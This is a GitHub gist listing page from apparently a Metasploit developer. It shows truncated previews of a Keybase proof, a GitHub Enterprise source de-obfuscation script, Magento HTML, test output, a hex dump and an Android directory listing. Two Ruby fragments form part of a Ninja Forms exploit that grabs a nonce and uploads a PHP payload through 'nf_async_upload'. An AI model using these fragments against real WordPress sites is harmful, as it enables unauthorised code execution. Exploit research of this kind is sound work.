sinn3r wchen-r7
wchen-r7
/ gist:cbb6b47f096eb4fd4a7c1c53d43d574f
Created
October 11, 2017 18:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Keybase proof | |
| I hereby claim: | |
| * I am wchen-r7 on github. | |
| * I am wchenr7 (https://keybase.io/wchenr7) on keybase. | |
| * I have a public key whose fingerprint is 4D08 AF54 0F66 C184 3C7D 1942 8048 8089 2F97 A3F7 | |
| To claim this, I am signing this object: |
wchen-r7
/ decrypt_github_enterprise.rb
Created
March 23, 2017 15:05
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/ruby | |
| # | |
| # This tool is only used to "decrypt" the github enterprise source code. | |
| # | |
| # Run in the /data directory of the instance. | |
| require "zlib" | |
| require "byebug" | |
| KEY = "This obfuscation is intended to discourage GitHub Enterprise customers "+ |
wchen-r7
/ gist:1b4e660484ac2434397dc94eb5e8bb25
Created
February 24, 2017 19:41
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| donkeu |
wchen-r7
/ gist:701269eaf9ce2c17ad3888e18ce12248
Last active
June 29, 2016 00:41
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def fetch_ninja_form_nonce | |
| uri = normalize_uri(target_uri.path, datastore['FORM_PATH']) | |
| res = send_request_cgi( | |
| 'method' => 'GET', | |
| 'uri' => uri | |
| ) | |
| puts res.body | |
| fail_with Failure::UnexpectedReply, 'Failed to acquire a nonce' unless res && res.code == 200 | |
| res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1] |
wchen-r7
/ gist:f1eabf17cb1f9f5a655b879d42c39682
Last active
June 28, 2016 23:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def generate_mime_message(payload_name, nonce) | |
| puts "--- You have nonce: #{nonce.inspect}" | |
| data = Rex::MIME::Message.new | |
| data.add_part('nf_async_upload', nil, nil, 'form-data; name="action"') | |
| data.add_part(nonce, nil, nil, 'form-data; name="security"') | |
| data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(10)}\"; filename=\"#{payload_name}\"") | |
| data | |
| end |
wchen-r7
/ gist:3d8b95aa9f3e14df8d65
Created
December 9, 2015 04:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: http://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| load "./lib/msf/core/exploit/exe.rb" | |
| require 'msf/core' | |
| class Metasploit3 < Msf::Exploit::Remote |
wchen-r7
/ gist:847a8d1246395bdbf7b1
Last active
November 24, 2015 05:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" | |
| "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> | |
| <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> | |
| <head> | |
| <title>Magento Downloader</title> | |
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> | |
| <link type="image/x-icon" href="/magento/downloader/favicon.ico" rel="icon"/> | |
| <link type="image/x-icon" href="/magento/downloader/favicon.ico" rel="shortcut icon"/> | |
| <script type="text/javascript" src="js/prototype.js"></script> |
wchen-r7
/ gist:557f825614eba20f27d7
Last active
November 10, 2015 18:25
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ rake cucumber spec coverage DATABASE_ADAPTER=sqlite3 | |
| /Users/wchen/.rvm/rubies/ruby-2.1.6/bin/ruby -S bundle exec cucumber features --format Fivemat | |
| 'derives' shared examples' attribute_type method ............ (23.01s) | |
| validates keyword argument .......... (17.46s) | |
| 7 scenarios (7 passed) | |
| 22 steps (22 passed) | |
| 0m40.481s | |
| Coverage report generated for 'derives' shared examples' :validates keyword argument With `validates: false`, 'derives' shared examples' :validates keyword argument With `validates: true`, 'derives' shared examples' :validates keyword argument Without `:validates` keyword argument, 'derives' shared examples' attribute_type method With `:datetime` for attribute_type, 'derives' shared examples' attribute_type method With `:string` for attribute_type, 'derives' shared examples' attribute_type method With `:text` for attribute_type, 'derives' shared examples' attribute_type method Without `:datetime`, `:string`, or `:text` for attribute_type, Cucumber Features, RSpec to /Users/wchen/rapid7/metasp |
wchen-r7
/ gist:d5a1fbd08923ea47ddc3
Created
October 14, 2015 18:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 01b4766c 8c f5 4e 00 00 00 00 00 00 00 00 00 d4 75 ..N..........u | |
| 01b4767a b4 01 e4 75 b4 01 00 00 00 00 b0 d9 12 00 ...u.......... | |
| 01b47688 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 .............. | |
| 01b47696 00 00 68 dc 78 01 88 d5 78 01 88 d5 78 01 ..h.x...x...x. | |
| 01b476a4 01 00 00 00 d8 2f 12 00 70 84 51 00 70 84 ...../..p.Q.p. | |
| 01b476b2 51 00 70 84 51 00 70 84 51 00 70 84 51 00 Q.p.Q.p.Q.p.Q. | |
| 01b476c0 70 84 51 00 70 84 51 00 70 84 51 00 00 00 p.Q.p.Q.p.Q... | |
| 01b476ce 00 00 00 00 00 00 70 84 51 00 70 84 51 00 ......p.Q.p.Q. | |
| 01b476dc 70 84 51 00 70 84 51 00 70 84 51 00 70 84 p.Q.p.Q.p.Q.p. | |
| 01b476ea 51 00 70 84 51 00 38 d5 78 01 c8 d6 78 01 Q.p.Q.8.x...x. |
wchen-r7
/ com.ilegendsoft.mercury
Created
September 17, 2015 16:42
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@generic:/data/data/com.ilegendsoft.mercury # pwd | |
| /data/data/com.ilegendsoft.mercury | |
| root@generic:/data/data/com.ilegendsoft.mercury # ls -R | |
| .: | |
| app_webview | |
| cache | |
| code_cache | |
| databases | |
| files |
NewerOlder